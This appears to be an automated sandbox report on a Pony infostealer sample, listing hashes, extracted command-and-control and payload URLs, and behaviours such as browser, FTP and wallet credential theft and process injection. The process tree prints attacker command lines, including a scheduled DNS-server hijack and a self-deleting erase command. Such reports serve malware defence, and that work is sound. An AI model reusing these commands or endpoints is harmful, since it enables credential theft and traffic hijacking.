Analysis
max time kernel: 91s
max time network: 139s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/11/2022, 08:34

Static task: static1
Behavioral task: behavioral1
  Sample: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Resource: win7-20221111-en
General
Target: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
Size: 81KB
MD5: 1535bd3f07b9163e3f8c1105318e4fa0
SHA1: bd6a3c48c57af869ab047d677b2e12623da2b2cf
SHA256: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c
SHA512: d7388ec2678bc18ba54b580611898d7d7f433c7396d6bd81f51aeabfc53e530b1826593554204def38f1242c301badc5d064d9e61451d1b52fffe48572b7c5d5
SSDEEP: 1536:BpAe/akMDYbcHmCPEY1Bh6OGYtl2ajXLB0M/3kIhG496yUBx7Vx1Q:BpAe/akMlmXYfgXYtxDmk3dhp2x7zy
Malware Config
Extracted: pony
  http://voladex.pw:36/fix/mark.php
  http://bolakes.pw:36/fix/refer.php
  http://camtest33.pw:36/fix/symbols.php
  payload_url: http://camtest3.pw:36/fix/Sonar.exe
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 988 set thread context of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86

Drops file in Windows directory (1 IoC)
  description | ioc | Process
  File created | C:\Windows\calc2.exe | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (4 IoCs)
  pid | pid_target | Process | procid_target
  3888 | 988 | WerFault.exe | 78
  2276 | 988 | WerFault.exe | 78
  4528 | 988 | WerFault.exe | 78
  2496 | 988 | WerFault.exe | 78

Runs ping.exe (1 TTP, 1 IoC)
  pid | Process
  2284 | PING.EXE

Suspicious use of AdjustPrivilegeToken (48 IoCs)
  description | pid | Process
  Token: SeImpersonatePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeTcbPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeChangeNotifyPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeCreateTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeBackupPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeRestorePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeIncreaseQuotaPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeAssignPrimaryTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeImpersonatePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeTcbPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeChangeNotifyPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeCreateTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeBackupPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeRestorePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeIncreaseQuotaPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeAssignPrimaryTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeImpersonatePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeTcbPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeChangeNotifyPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeCreateTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeBackupPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeRestorePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeIncreaseQuotaPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeAssignPrimaryTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeImpersonatePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeTcbPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeChangeNotifyPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeCreateTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeBackupPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeRestorePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeIncreaseQuotaPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeAssignPrimaryTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeImpersonatePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeTcbPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeChangeNotifyPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeCreateTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeBackupPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeRestorePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeIncreaseQuotaPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeAssignPrimaryTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeImpersonatePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeTcbPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeChangeNotifyPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeCreateTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeBackupPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeRestorePrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeIncreaseQuotaPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Token: SeAssignPrimaryTokenPrivilege | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe

Suspicious use of WriteProcessMemory (20 IoCs)
  description | pid | Process | procid_target
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 988 wrote to memory of 1872 | 988 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 86
  PID 1872 wrote to memory of 4576 | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 96
  PID 1872 wrote to memory of 4576 | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 96
  PID 1872 wrote to memory of 4576 | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 96
  PID 4576 wrote to memory of 2288 | 4576 | cmd.exe | 98
  PID 4576 wrote to memory of 2288 | 4576 | cmd.exe | 98
  PID 4576 wrote to memory of 2288 | 4576 | cmd.exe | 98
  PID 1872 wrote to memory of 3672 | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 99
  PID 1872 wrote to memory of 3672 | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 99
  PID 1872 wrote to memory of 3672 | 1872 | 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe | 99
  PID 3672 wrote to memory of 2284 | 3672 | cmd.exe | 101
  PID 3672 wrote to memory of 2284 | 3672 | cmd.exe | 101
  PID 3672 wrote to memory of 2284 | 3672 | cmd.exe | 101
Processes

C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
  PID: 988
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 308
      PID: 3888
      - Program crash

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 328
      PID: 2276
      - Program crash

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 336
      PID: 4528
      - Program crash

    C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
      PID: 1872
      - Checks computer location settings
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c at 09:37:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
          PID: 4576
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\at.exe
              Command line: at 09:37:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
              PID: 2288

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
          PID: 3672
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\PING.EXE
              Command line: ping -n 10 localhost
              PID: 2284
              - Runs ping.exe

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 320
      PID: 2496
      - Program crash

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 988 -ip 988
  PID: 2424

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 988 -ip 988
  PID: 960

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 988 -ip 988
  PID: 4620

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 988 -ip 988
  PID: 4552